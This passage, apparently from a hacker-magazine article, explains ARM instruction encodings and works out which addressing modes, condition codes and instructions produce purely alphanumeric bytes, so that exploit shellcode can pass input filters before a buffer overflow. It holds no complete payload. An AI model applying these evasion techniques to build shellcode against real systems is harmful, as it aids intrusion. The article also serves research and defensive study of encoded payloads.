+The conditional execution of an instruction is represented by adding
+a suffix to the name of the instruction that denotes in which
+circumstances it will be executed. Without this suffix, the
+instruction will always be executed.
+
+As a short example, consider the following C fragment:
+
+    if (err != 0)
+        printf("An error has occurred! Errorcode = %i\n", err);
+    else
+        printf("Everything is ok!\n");
+
+GCC compiles the above code to:
+
+        cmp     r1, #0
+        beq     .L4
+        ldr     r0, .L9
+        bl      printf
+        b       .L8
+.L4:
+        ldr     r0, .L9+4
+        bl      puts
+.L8:
+
+With conditional execution, it could be rewritten as:
+
+        cmp       r1, #0
+        ldrne     r0, .L9
+        blne      printf
+        ldreq     r0, .L9+4
+        bleq      puts
+
+The 'ne' suffix means that the instruction will only be executed if
+the contents of, in this case, R1 is not equal to 0. Similarly, the
+'eq' suffix means that the instructions will be executed if the
+contents of R1 is equal to 0.
+
+
+----[ 1.4 Example Instructions
+
+ARM instructions are grouped into a number of categories, and each
+category has a similar bit layout. For illustration purposes, we
+will list and discuss some of these groups here. This list is not
+meant to be exhaustive or complete.
+
+The first group of instructions are called 'data processing
+instructions'. This group covers a broad range of operations, which
+includes basic arithmetic and bitwise operations. Data processing
+instructions can be called with two registers as operands, or with a
+register and an immediate value. An example of each of these options
+is show below.
+
+  31 28 27 26 25 24  21 20 19 16 15 12 11         7 6   5 4 3 0
+ +-----+--+--+--+------+--+-----+-----+------------+-----+-+---+
+ |cond | 0| 0| 0|opcode| S|  Rn |  Rd |shift amount|shift|0| Rm|
+ +-----+--+--+--+------+--+-----+-----+------------+-----+-+---+
+
+  Example:  SUBPL r6, pc, r5, ror #2
+            0101 0 0 0 0010 0 1111 0110 00010 11 0 0101
+
+  31  28 27 26 25 24  21 20 19  16 15  12 11   8 7            0
+ +------+--+--+--+------+--+------+------+------+--------------+
+ | cond | 0| 0| 1|opcode| S|  Rn  |  Rd  |rotate|   immediate  |
+ +------+--+--+--+------+--+------+------+------+--------------+
+
+  Example:  SUBPL r3, r1, #56
+            0101 0 0 1 0010 0 0001 0011 0000 00111000
+
+
+A second set of important instructions, are the instructions used to
+load bytes from the memory into registers, and to store the result
+of calculations back into the memory. In our shellcode, we will
+typically call them with an immediate offset as operand.
+
+  31 28 27 26 25 24 23 22 21 20 19  16 15  12 11          0
+ +-----+--+--+--+--+--+--+--+--+------+------+-------------+
+ |cond | 0| 1| 0| P| U| W| B| L|  Rn  |  Rd  |  immediate  |
+ +-----+--+--+--+--+--+--+--+--+------+------+-------------+
+
+  Example:  LDRMIB r3, [pc, #-48]
+            0100 0 1 0 1 0 1 0 1 1111 0011 000000110000
+
+
+An interesting alternative to loading and storing registers one at a
+time, is to use the 'load/store multiple' instructions. The
+instructions in this group all load or store multiple registers at
+once. Bits 15 to 0 hold which registers will be operated on.
+
+  31 28 27 26 25 24 23 22 21 20 19  16 15            0
+ +-----+--+--+--+--+--+--+--+--+------+---------------+
+ |cond | 1| 0| 0| P| U| S| W| L|  Rn  | register list |
+ +-----+--+--+--+--+--+--+--+--+------+---------------+
+
+  Example:  STMMIFD r5, {r0, r3, r4, r6, r8, lr}^
+            0100 1 0 0 1 0 1 0 0 0101 0100000101011001
+
+
+The groups described in this section are only a small subset of the
+different instruction categories. However, these four groups are the
+most important ones in the context of this article.
+
+
+----[ 1.5 The Thumb Instruction Set
+
+Thumb mode is a mode in which the ARM processor can be set by
+changing the T bit of the CPSR register to 1. In this mode, the
+processor will use 16 bit instructions, which allows for better code
+density. Only T variants of the ARM processor support this mode
+(e.g. ARM4T), however as of ARMv6 Thumb support is mandatory.
+Instructions executed in 32 bit mode are called ARM instructions,
+while instructions executed in 16 bit mode are called Thumb
+instructions. Since instructions are only 2 bytes large in Thumb mode,
+it is easier to satisfy the alphanumeric constraints for instructions.
+To this end, we discuss how to get into Thumb mode from ARM mode in
+our shellcode. While our shellcode can run with only ARM instructions,
+writing code in Thumb mode is more convenient and smaller, resulting
+in less instructions and more compact shellcode. For programs already
+running in Thumb mode, we discuss a way of going back to ARM mode.
+Unlike ARM instructions, Thumb instructions do not support conditional
+execution.
+
+Given the fact that we can easily switch from ARM to Thumb and back
+and that ARM mode can do everything that we need, even if no Thumb
+mode is available, we achieve the broadest possible compatibility in
+our shellcode.
+
+
+
+--[ 2.- Alphanumeric shellcode
+
+
+----[ 2.0 Alphanumeric bit patterns
+
+A common problem for exploit writers is that their shellcode has to
+survive one or more byte transformations, before triggering the
+actual buffer overflow. These transformations could for instance be
+text encoding conversions, but could also be related to parsing or
+input validation. In most cases, alphanumeric bytes are likely to
+get through unmodified. Therefore, having shellcode with only
+alphanumeric instructions is sometimes necessary and often
+preferred.
+
+An alphanumeric instruction is an instruction where each of the four
+bytes of the instruction is either an upper or lower case letter, or
+a number. In particular, the bit patterns of these bytes must always
+conform to the following constraints:
+ - Bit 7 must be set to 0
+ - Bit 6 or 5 must be set to 1
+ - If bit 5 is set, but bit 6 isn't, then bit 4 must also be set
+
+These constraints do not eliminate all non-alphanumeric characters,
+but they can be used as a rule of thumb to quickly dismiss most of
+the invalid bytes. Each instruction will have to be checked whether
+its bit pattern follows these conditions and under which
+circumstances.
+
+A potential problem for exploit writers is to get the return address
+to also be alphanumeric. This is not further discussed in this
+article as it strongly depends from situation to situation.
+
+
+----[ 2.1 Addressing modes
+
+In this section we will describe which addressing modes we can use
+that will ensure that our shellcode is alphanumeric.
+
+----[ 2.1.0 Addressing modes for data processing
+
+1. #immediate
+  11     8 7                   0
+ +--------+---------------------+
+ | rotate |      imm_8          |
+ +--------+---------------------+
+Since we can fully control the value of imm_8, we can ensure that it
+is alphanumeric.
+
+2. <Rm>
+  11 10  9  8  7  6  5  4 3      0
+ +--+--+--+--+--+--+--+--+-------+
+ | 0| 0| 0| 0| 0| 0| 0| 0|   Rm  |
+ +--+--+--+--+--+--+--+--+-------+
+Since bits 6 and 5 are both 0, this type of addressing mode can not
+be used  in alphanumeric shellcode.
+
+3. <Rm>, LSL #<shift_imm>
+  11        7  6  5  4 3       0
+ +-----------+--+--+--+--------+
+ | shift_imm | 0| 0| 0|   Rm   |
+ +-----------+--+--+--+--------+
+As in addressing mode 2, bits 6 and 5 are 0, so it can not be
+represented alphanumerically.
+
+4. <Rm>, LSL <Rs>
+  11     8  7  6  5  4 3       0
+ +-----------+--+--+--+--------+
+ |   Rs   | 0| 0| 0| 1|   Rm   |
+ +-----------+--+--+--+--------+
+Again, bits 6 and 5 are 0, so this addressing mode can not be used.
+
+5. <Rm>, LSR #<shift_imm>
+  11        7  6  5  4 3       0
+ +-----------+--+--+--+--------+
+ | shift_imm | 0| 1| 0|   Rm   |
+ +-----------+--+--+--+--------+
+Since bit 6 is 0, bits 5 and 4 must both be one. Only bit 5 is
+one, we can not represent this addressing mode alphanumerically.
+
+6. <Rm>, LSR <Rs>
+  11     8  7  6  5  4 3       0
+ +-----------+--+--+--+--------+
+ |   Rs   | 0| 0| 1| 1|   Rm   |
+ +-----------+--+--+--+--------+
+Bit 6 is 0, but since bits 5 and 4 are both set to 1, we can use
+this addressing mode in our alphanumeric shellcode. Register Rm 
+must be less than R10.
+
+7. <Rm>, ASR #<shift_imm>
+  11        7  6  5  4 3       0
+ +-----------+--+--+--+--------+
+ | shift_imm | 1| 0| 0|   Rm   |
+ +-----------+--+--+--+--------+
+Since bit 6 is set to 1, the only restriction on this addressing
+mode is that Rm can not be R0.
+
+8. <Rm>, ASR <Rs>
+  11     8  7  6  5  4 3       0
+ +-----------+--+--+--+--------+
+ |   Rs   | 0| 1| 0| 1|   Rm   |
+ +-----------+--+--+--+--------+
+This bit pattern is alphanumeric and allows any register to be used
+as Rm.
+
+9. <Rm>, ROR #<shift_imm>
+  11        7  6  5  4 3       0
+ +-----------+--+--+--+--------+
+ | shift_imm | 1| 1| 0|   Rm   |
+ +-----------+--+--+--+--------+
+Like addressing mode 8, this pattern is alphanumeric and any register
+can be used as Rm.
+
+10. <Rm>, ROR <Rs>
+ 11     8  7  6  5  4 3       0
++-----------+--+--+--+--------+
+|   Rs   | 0| 1| 1| 1|   Rm   |
++-----------+--+--+--+--------+
+Since bits 6, 5 and 4 are set to 1, Rm must be smaller than R11.
+
+11. <Rm>, RRX
+  11 10  9  8  7  6  5  4 3      0
+ +--+--+--+--+--+--+--+--+-------+
+ | 0| 0| 0| 0| 0| 1| 1| 0|   Rm  |
+ +--+--+--+--+--+--+--+--+-------+
+This bit pattern is alphanumeric and any register can be used as Rm.
+
+----[ 2.1.1 Addressing modes for load/store word or unsigned byte
+
+1. [<Rn>, #+/-<imm_12>]<!>
+  11                            0
+ +------------------------------+
+ |            imm_12            |
+ +------------------------------+
+Since we can fully control the value of imm_12, we can ensure that
+it is alphanumeric.
+
+2. [<Rn>, +/-<Rm>]<!>
+  11 10  9  8  7  6  5  4 3      0
+ +--+--+--+--+--+--+--+--+-------+
+ | 0| 0| 0| 0| 0| 0| 0| 0|   Rm  |
+ +--+--+--+--+--+--+--+--+-------+
+This addressing mode can not be represented alphanumerically.
+
+3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!>
+  11        7  6  5  4 3       0
+ +-----------+-----+--+--------+
+ | shift_imm |shift| 0|   Rm   |
+ +-----------+-----+--+--------+
+- If shift is LSL, then bits 6 and 5 are 0. This is not
+alphanumeric.
+- If shift is LSR, then bit 6 is 0 and bit 5 is 1. But since bit 4
+stays 0, it is not alphanumeric.
+- If shift is ASR, then bit 6 is 1 and bit 5 is 0. This means that
+it is alphanumeric as long as Rm is not R0.
+- If shift is ROR or RRX, then bits 6 and 5 will be 1, which is
+alphanumeric, regardless of the register used as Rm.
+
+The other post-indexing addressing modes discussed above have
+essentially the same bit layout for the last 12 bytes. They only
+differ in that these modes will unset bit 24 in the load or store
+instruction.
+
+----[ 2.1.2 Addressing modes for load/store multiple
+
+The increment addressing modes will set bit 23 in the load or store
+instruction, while the decrement modes will unset bit 23. If bit 23
+is set, then the instruction can not be represented
+alphanumerically. So only the decrement addressing mode can be used
+in alphanumeric shellcode.
+
+
+----[ 2.2 Conditional Execution
+
+Because the condition code of an instruction is encoded in the most
+significant bits of the fourth byte of the instruction (bits 31-28),
+the value of the condition code has a direct impact on the
+alphanumeric properties of the instruction. As a result, only a
+limited set of condition codes can be used in alphanumeric
+shellcode. The table below lists all the condition codes and their
+corresponding bit pattern:
+
+   [bitpattern]  [name]          [description]
+       0000        EQ     Equal
+       0001        NE     Not equal
+       0010        CS/HS  Carry set/unsigned higher or same
+       0011        CC/LO  Carry clear/unsigned lower
+       0100        MI     Minus/negative
+       0101        PL     Plus/positive or zero
+       0110        VS     Overflow
+       0111        VC     No overflow
+       1000        HI     Unsigned higher
+       1001        LS     Unsigned lower or same
+       1010        GE     Signed greater than or equal
+       1011        LT     Signed less than
+       1100        GT     Signed greater than
+       1101        LE     Signed less than or equal
+       1110        AL     Always (unconditional) -
+       1111        (used for other purposes)
+      _|  |_
+     |      |
+   bit31  bit28
+
+Remember that the most significant bit of a byte should always be
+set to 0 in order to be alphanumeric, so this excludes the last
+eight condition codes. In addition, the resulting byte must be at
+least 0x30, so this excludes the first three condition codes too.
+
+Unfortunately, 'AL' is one of the codes that cannot be used in
+alphanumeric shellcode. This means that all ARM instructions must be
+executed conditionally. In this article, we choose PL and MI as the
+two condition codes that we will use. They are mutually exclusive,
+so we can always ensure that an instruction gets executed by simply
+adding the same instruction twice to the shellcode, once with the PL
+suffix and once with the MI suffix.
+
+
+----[ 2.3 The Instruction List
+
+In our list of instructions, we make a distinction between SZ/SO
+(should be zero/should be one) and IZ/IO (is zero/is one). We do this
+because the ARM reference manual specifies that specific bits must
+be set to 0 or 1 and others "should be" set to 0 or 1 (defined as SBZ
+or SBO in the manual). However, on our test processor if we set a bit
+marked as "should be" to something else, the processor throws an
+undefined instruction exception. As such, we've considered should be
+and must be to be equivalent for our discussion, but we note the
+difference should this behavior be different in other processors
+(since this would allow us to use many more instructions).
+
+The table below lists all the instructions present in ARMv6. For
+each instruction, we've checked some simple constraints that may not
+be broken in order for the instruction to be alphanumeric. The main
+focus of this table is the high order bits of the second byte of the
+instruction (bits 23 to 20). The reason that only the high order bits
+of this byte are included, is because the high order bits of the
+first byte are set by the condition flags, and the high order bits
+of the third and fourth byte are often set by the operands of the
+instruction. When the table contains the value 'd' for a bit, it
+means that the value of this bit depends on specific settings.
+
+The final column contains a list of things that disqualify the
+instruction for being used in alphanumeric shellcode.
+Disqualification criteria are that at least one of the four bytes of
+the instruction is either always too high to be alphanumeric, or
+too low. In this column, the following conventions are used:
+ - 'IO' is used to indicate that one or more bits is always 1
+ - 'IZ' is used to indicate that one or more bits is always 0
+ - 'SO' is used to indicate that one or more bits should be 1
+ - 'SZ' is used to indicate that one or more bits should be 0
+
++-----------+--------+--+--+--+--+---------------------------+
+|instruction|version |23|22|21|20|disqualifiers              |
++-----------+--------+--+--+--+--+---------------------------+
+|ADC        |        |1 |0 |1 |d |IO: 23                     |
+|ADD        |        |1 |0 |0 |d |IO: 23                     |
+|AND        |        |0 |0 |0 |d |IZ: 23-21                  |
+|B, BL      |        |d |d |d |d |                           |
+|BIC        |        |1 |1 |0 |d |IO: 23                     |
+|BKPT       |5+      |0 |0 |1 |0 |IO: 31, IZ: 22, 20         |
+|BLX (1)    |5+      |d |d |d |d |IO: 31                     |
+|BLX (2)    |5+      |0 |0 |1 |0 |SO: 15, IZ: 22, 20         |
+|BX         |4T, 5+  |0 |0 |1 |0 |IO: 7, SO: 15, IZ 22, 20   |
+|BXJ        |5TEJ, 6+|0 |0 |1 |0 |SO: 15, IZ: 22, 20, 6, 4   |
+|CDP        |        |d |d |d |d |                           |
+|CLZ        |5+      |0 |1 |1 |0 |IZ: 7-5                    |
+|CMN        |        |0 |1 |1 |1 |SZ: 15-13                  |
+|CMP        |        |0 |1 |0 |1 |SZ: 15-13                  |
+|CPS        |6+      |0 |0 |0 |0 |SZ: 15-13, IZ 22-20        |
+|CPY        |6+      |1 |0 |1 |0 |IZ: 22, 20, 7-5, IO 23     |
+|EOR        |        |0 |0 |1 |d |                           |
+|LDC        |        |d |d |d |1 |                           |
+|LDM (1)    |        |d |0 |d |1 |                           |
+|LDM (2)    |        |d |1 |0 |1 |                           |
+|LDM (3)    |        |d |1 |d |1 |IO: 15                     |
+|LDR        |        |d |0 |d |1 |                           |
+|LDRB       |        |d |1 |d |1 |                           |
+|LDRBT      |        |0 |1 |1 |1 |                           |
+|LDRD       |5TE+    |d |d |d |0 |                           |
+|LDREX      |6+      |1 |0 |0 |1 |IO: 23, 7                  |
+|LDRH       |        |d |d |d |1 |IO: 7                      |
+|LDRSB      |4+      |d |d |d |1 |IO: 7                      |
+|LDRSH      |4+      |d |d |d |1 |IO: 7                      |
+|LDRT       |        |d |0 |1 |1 |                           |
+|MCR        |        |d |d |d |0 |                           |
+|MCRR       |5TE+    |0 |1 |0 |0 |                           |
+|MLA        |        |0 |0 |1 |d |IO: 7                      |
+|MOV        |        |1 |0 |1 |d |IO: 23                     |
+|MRC        |        |d |d |d |1 |                           |
+|MRRC       |5TE+    |0 |1 |0 |1 |                           |
+|MRS        |        |0 |d |0 |0 |SZ: 7-0                    |
+|MSR        |        |0 |d |1 |0 |SO: 15                     |
+|MUL        |        |0 |0 |0 |d |IO: 7                      |
+|MVN        |        |1 |1 |1 |d |IO: 23                     |
+|ORR        |        |1 |0 |0 |d |IO: 23                     |
+|PKHBT      |6+      |1 |0 |0 |0 |IO: 23                     |
+|PKHTB      |6+      |1 |0 |0 |0 |IO: 23                     |
+|PLD        |5TE+,   |d |1 |0 |1 |IO: 15                     |
+|           |!5TExP  |  |  |  |  |                           |
+|QADD       |5TE+    |0 |0 |0 |0 |IZ: 22-21                  |
+|QADD16     |6+      |0 |0 |1 |0 |IZ: 22, 20                 |
+|QADD8      |6+      |0 |0 |1 |0 |IZ: 22, 20, IO: 7          |
+|QADDSUBX   |6+      |0 |0 |1 |0 |IZ: 22, 20                 |
+|QDADD      |5TE+    |0 |1 |0 |0 |                           |
+|QDSUB      |5TE+    |0 |1 |1 |0 |                           |
+|QSUB       |5TE+    |0 |0 |1 |0 |IZ: 22, 20                 |
+|QSUB16     |6+      |0 |0 |1 |0 |IZ: 22, 20                 |
+|QSUB8      |6+      |0 |0 |1 |0 |IZ: 22, 20, IO: 7          |
+|QSUBADDX   |6+      |0 |0 |1 |0 |IZ: 22, 20                 |
+|REV        |6+      |1 |0 |1 |1 |IO: 23                     |
+|REV16      |6+      |1 |0 |1 |1 |IO: 23, 7                  |
+|REVSH      |6+      |1 |1 |1 |1 |IO: 23, 7                  |
+|RFE        |6+      |d |0 |d |1 |SZ: 14-13, 6-5             |
+|RSB        |        |0 |1 |1 |d |                           |
+|RSC        |        |1 |1 |1 |d |IO: 23                     |
+|SADD16     |6+      |0 |0 |0 |1 |IZ: 22-21                  |
+|SADD8      |6+      |0 |0 |0 |1 |IZ: 22-21, IO: 7           |
+|SADDSUBX   |6+      |0 |0 |0 |1 |IZ: 22-21                  |
+|SBC        |        |1 |1 |0 |d |IO: 23                     |
+|SEL        |6+      |1 |0 |0 |0 |IO: 23                     |
+|SETEND     |6+      |0 |0 |0 |0 |SZ: 14-13, IZ: 22-21, 6-5  |
+|SHADD16    |6+      |0 |0 |1 |1 |IZ: 6-5                    |
+|SHADD8     |6+      |0 |0 |1 |1 |IO: 7                      |
+|SHADDSUBX  |6+      |0 |0 |1 |1 |                           |
+|SHSUB16    |6+      |0 |0 |1 |1 |                           |
+|SHSUB8     |6+      |0 |0 |1 |1 |IO: 7                      |
+|SHSUBADDX  |6+      |0 |0 |1 |1 |                           |
+|SMLA<x><y> |5TE+    |0 |0 |0 |0 |IO: 7, IZ: 22-21           |
+|SMLAD      |6+      |0 |0 |0 |0 |IZ: 22-21                  |
+|SMLAL      |        |1 |1 |1 |d |IO: 23,7                   |
+|SMLAL<x><y>|5TE+    |0 |1 |0 |0 |IO: 7                      |
+|SMLALD     |6+      |0 |1 |0 |0 |                           |
+|SMLAW<y>   |5TE+    |0 |0 |1 |0 |IZ: 22, 20, IO: 7          |
+|SMLSD      |6+      |0 |0 |0 |0 |IZ: 22-21                  |
+|SMLSLD     |6+      |0 |1 |0 |0 |                           |
+|SMMLA      |6+      |0 |1 |0 |1 |                           |
+|SMMLS      |6+      |0 |1 |0 |1 |IO: 7                      |
+|SMMUL      |6+      |0 |1 |0 |1 |IO: 15                     |
+|SMUAD      |6+      |0 |0 |0 |0 |IZ: 22-21, IO: 15          |
+|SMUL<x><y> |5TE+    |0 |1 |1 |0 |SZ: 15, IO: 7              |
+|SMULL      |        |1 |1 |0 |d |IO: 23                     |
+|SMULW<x><y>|5TE+    |0 |0 |1 |0 |IZ: 22, 20,SZ: 14-13, IO: 7|
+|SMUSD      |6+      |0 |0 |0 |0 |IZ: 22-21, IO: 15          |
+|SRS        |6+      |d |1 |d |0 |SZ: 14-13, 6-5             |
+|SSAT       |6+      |1 |0 |1 |d |IO: 23                     |
+|SSAT16     |6+      |1 |0 |1 |0 |IO: 23                     |
+|SSUB16     |6+      |0 |0 |0 |1 |IZ: 22-21                  |
+|SSUB8      |6+      |0 |0 |0 |1 |IZ: 22-21, IO: 7           |
+|SSUBADDX   |6+      |0 |0 |0 |1 |IZ: 22-21                  |
+|STC        |2+      |d |d |d |0 |                           |
+|STM (1)    |        |d |0 |d |0 |IZ: 22, 20                 |
+|STM (2)    |        |d |1 |0 |0 |                           |
+|STR        |        |d |0 |d |0 |IZ: 22, 20                 |
+|STRB       |        |d |1 |d |0 |                           |
+|STRBT      |        |d |1 |1 |0 |                           |
+|STRD       |5TE+    |d |d |d |0 |IO: 7                      |
+|STREX      |6+      |1 |0 |0 |0 |IO: 7                      |
+|STRH       |4+      |d |d |d |0 |IO: 7                      |
+|STRT       |        |d |0 |1 |0 |IZ: 22, 20                 |
+|SUB        |        |0 |1 |0 |d |                           |
+|SWI        |        |d |d |d |d |                           |
+|SWP        |2a, 3+  |0 |0 |0 |0 |IZ: 22-21, IO: 7           |
+|SWPB       |2a, 3+  |0 |1 |0 |0 |IO: 7                      |
+|SXTAB      |6+      |1 |0 |1 |0 |IO: 23                     |
+|SXTAB16    |6+      |1 |0 |0 |0 |IO: 23                     |
+|SXTAH      |6+      |1 |0 |1 |1 |IO: 23                     |
+|SXTB       |6+      |1 |0 |1 |0 |IO: 23                     |
+|SXTB16     |6+      |1 |0 |0 |0 |IO: 23                     |
+|SXTH       |6+      |1 |0 |1 |1 |IO: 23                     |
+|TEQ        |        |0 |0 |1 |1 |SZ: 14-13                  |
+|TST        |        |0 |0 |0 |1 |IZ: 22-21, SZ: 14-13       |
+|UADD16     |6+      |0 |1 |0 |1 |IZ: 6-5                    |
+|UADD8      |6+      |0 |1 |0 |1 |IO: 7                      |
+|UADDSUBX   |6+      |0 |1 |0 |1 |                           |
+|UHADD16    |6+      |0 |1 |1 |1 |IZ: 6-5                    |
+|UHADD8     |6+      |0 |1 |1 |1 |IO: 7                      |
+|UHADDSUBX  |6+      |0 |1 |1 |1 |                           |
+|UHSUB16    |6+      |0 |1 |1 |1 |                           |
+|UHSUB8     |6+      |0 |1 |1 |1 |IO: 7                      |
+|UHSUBADDX  |6+      |0 |1 |1 |1 |                           |
+|UMAAL      |6+      |0 |1 |0 |0 |IO: 7                      |
+|UMLAL      |        |1 |0 |1 |d |IO: 23, 7                  |
+|UMULL      |        |1 |0 |0 |d |IO: 23, 7                  |
+|UQADD16    |6+      |0 |1 |1 |0 |IZ: 6-5                    |
+|UQADD8     |6+      |0 |1 |1 |0 |IO: 7                      |
+|UQADDSUBX  |6+      |0 |1 |1 |0 |                           |
+|UQSUB16    |6+      |0 |1 |1 |0 |                           |
+|UQSUB8     |6+      |0 |1 |1 |0 |IO: 7                      |
+|UQSUBADDX  |6+      |0 |1 |1 |0 |                           |
+|USAD8      |6+      |1 |0 |0 |0 |IO: 23, 15, IZ: 6-5        |
+|USADA8     |6+      |1 |0 |0 |0 |IO: 23, IZ: 6-5            |
+|USAT       |6+      |1 |1 |1 |d |IO: 23                     |
+|USAT16     |6+      |1 |1 |1 |0 |IO: 23                     |
+|USUB16     |6+      |0 |1 |0 |1 |                           |
+|USUB8      |6+      |0 |1 |0 |1 |IO: 7                      |
+|USUBADDX   |6+      |0 |1 |0 |1 |                           |
+|UXTAB      |6+      |1 |1 |1 |0 |IO: 23                     |
+|UXTAB16    |6+      |1 |1 |0 |0 |IO: 23                     |
+|UXTAH      |6+      |1 |1 |1 |1 |IO: 23                     |
+|UXTB       |6+      |1 |1 |1 |0 |IO: 23                     |
+|UXTB16     |6+      |1 |1 |0 |0 |IO: 23                     |
+|UXTH       |6+      |1 |1 |1 |1 |IO: 23                     |
++-----------+--------+--+--+--+--+---------------------------+
+
+From the list of 147 instructions that are present in the latest
+revision of the ARM documentation, we will now remove all
+instructions that require a specific ARM architecture version and
+all the instructions that we have disqualified based on whether or
+not they have bit patterns which are incompatible with alphanumeric
+characters.
+
+This leaves us with 18 instructions, as listed in the reference
+manual: B/BL, CDP, EOR, LDC, LDM(1), LDM(2), LDR, LDRB, LDRBT, LDRT,
+MCR, MRC, RSB, STM(2), STRB, STRBT, SUB, SWI.
+
+There are a few instructions listed here that are of limited use to
+us though:
+    - B/BL: the Branch instruction is of limited use to us in most
+      cases: the last 24 bits of this instruction are taken and
+      then shifted left two positions (because instructions must always
+      start at a multiple of 4). The result is then added to the
+      program counter and execution will then continue at that location.
+      To make this offset alphanumeric, we would have to jump at least
+      12MB from our current location, this limits the usefulness of this
+      instruction since we will not always be able to control memory that
+      is at least 12MB from our shellcode.
+    - CDP: is used to tell the coprocessor to do some kind of data
+      processing. Since we can not be sure about which coprocessors
+      may be available or not on a specific platform, we discard this
+      instruction as well.
+    - LDC: the load coprocessor instruction loads data from a
+      consecutive range of memory addresses into a coprocessor.
+    - MCR/MRC: move  to and from coprocessor register to and from ARM
+      registers. While this instruction could be useful for caching
+      purposes (more on this later), it is a privileged instruction
+      before ARMv6.
+
+We are now left with 13 instructions: EOR, LDM(1), LDM(2), LDR,
+LDRB, LDRBT, LDRT, RSB, STM, STRB, STRBT, SUB, SWI. We now group
+together the instructions that have the same basic functionality
+but that only differ in the details. For instance, LDR loads a word
+from memory into a register whereas LDRB loads a byte into the least
+significant bytes of a register. We get the following:
+    - EOR: Exclusive OR
+    - LDM (LDM(1), LDM(2)): Load multiple registers from a consecutive
+      memory locations
+    - LDR (LDR, LDRB, LDRBT, LDRT): Load value from memory
+      into a register
+    - STM: Store multiple registers to consecutive memory locations
+    - STR (STRB, STRBT): Store a register to memory
+    - SUB (SUB, RSB): Subtract
+    - SWI: Software Interrupt a.k.a. do a system call
+
+Unfortunately, the instructions in the above list are not always
+alphanumeric. Depending on which operands are used, these functions
+may still generate non-alphanumeric characters. Hence, some
+additional constraints must be specified for each function. Below,
+we discuss these constraints for the instructions in the groups.
+
+- EOR:  Syntax: EOR{<cond>}{S} <Rd>, <Rn>, <shifter_operand>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11                0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
+ |cond | 0| 0| I| 0| 0| 0| 1| S|  Rn |  Rd |  shifter_operand  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
+
+ In order for the second byte to be alphanumeric, the S bit must be
+ set to 1. If this bit is set to 0, the resulting value would be
+ less than 47, which is not alphanumeric. Rn can also not be a
+ register higher than R9. Since Rd is encoded in the first four bits
+ of the third byte, it may not start with a 1. This means that only
+ the low registers can be used. In addition, register R0 to R2 can
+ not be used, because this would generate a byte that is too
+ low to be alphanumeric. The shifter operand must be tweaked, such
+ that its most significant four bytes generate valid alphanumeric
+ characters in combination with Rd. The eight least significant
+ bits are, of course, also significant as they fully determine the
+ fourth byte of the instruction. Details about the shifter operand
+ can be found in the ARM architecture reference manual.
+
+- LDM(1):  Syntax: LDM{<cond>}<addressing_mode> <Rn>{!}, <registers>
+
+  31 28 27 26 25 24 23 22 21 20 19  16 15            0
+ +-----+--+--+--+--+--+--+--+--+------+---------------+
+ |cond | 1| 0| 0| P| U| 0| W| 1|  Rn  | register list |
+ +-----+--+--+--+--+--+--+--+--+------+---------------+
+
+  LDM(2):  Syntax: LDM{<cond>}<addressing_mode> <Rn>,
+                          <registers_without_pc>^
+
+  31 28 27 26 25 24 23 22 21 20 19  16 15 14            0
+ +-----+--+--+--+--+--+--+--+--+------+--+---------------+
+ |cond | 1| 0| 0| P| U| 1| 0| 1|  Rn  | 0| register list |
+ +-----+--+--+--+--+--+--+--+--+------+------------------+
+
+ The list of registers that is loaded into memory is stored in the
+ last two bytes of the instructions. As a result, not any list of
+ registers can be used. In particular, for the low registers,
+ R7 can never be used. R6 or R5 must be used, and if R6 is not used,
+ R4 must be used. The same goes for the high registers.
+ Additionally, the U bit must be set to 0 and the W bit to 1, to
+ ensure that the second byte of the instruction is alphanumeric. For
+ Rn, registers R0 to R9 can be used with LDM(1), and R0 to R10 can
+ be used with LDM(2).
+
+- LDR:  Syntax: LDR{<cond>} <Rd>, <addressing_mode>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+ |cond | 0| 1| I| P| U| 0| W| 1|  Rn |  Rd |  addr_mode  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+
+  LDRB:  Syntax: LDR{<cond>}B <Rd>, <addressing_mode>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+ |cond | 0| 1| I| P| U| 1| W| 1|  Rn |  Rd |  addr_mode  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+
+  LDRBT:  Syntax: LDR{<cond>}BT <Rd>, <post_indexed_addressing_mode>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+ |cond | 0| 1| I| 0| U| 1| 1| 1|  Rn |  Rd |  addr_mode  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+
+  LDRT:  Syntax: LDR{<cond>}T <Rd>, <post_indexed_addressing_mode>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+ |cond | 0| 1| I| 0| U| 0| 1| 1|  Rn |  Rd |  addr_mode  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+
+ The details of the addressing mode are described in the ARM
+ reference manual and will not be repeated here for brevity's sake.
+ However, the addressing mode must be specified in a way such that
+ the fourth byte of the instruction is alphanumeric, and the least
+ significant four bits of the third byte generate a valid character in
+ combination with Rd. Rd cannot be one of the high registers, and
+ cannot be R0-R2. The U bit must also be 0.
+
+- STM:  Syntax: STM{<cond>}<addressing_mode> <Rn>, <registers>^
+
+  31 28 27 26 25 24 23 22 21 20 19  16 15            0
+ +-----+--+--+--+--+--+--+--+--+------+---------------+
+ |cond | 1| 0| 0| P| U| 1| 0| 0|  Rn  | register list |
+ +-----+--+--+--+--+--+--+--+--+------+---------------+
+
+  STRB:  Syntax: STR{<cond>}B <Rd>, <addressing_mode>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+ |cond | 0| 1| I| P| U| 1| W| 0|  Rn |  Rd |  addr_mode  |
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
+
+  STRBT:  Syntax: STR{<cond>}BT <Rd>, <post_indexed_addressing_mode>
+
+  31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
+ +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
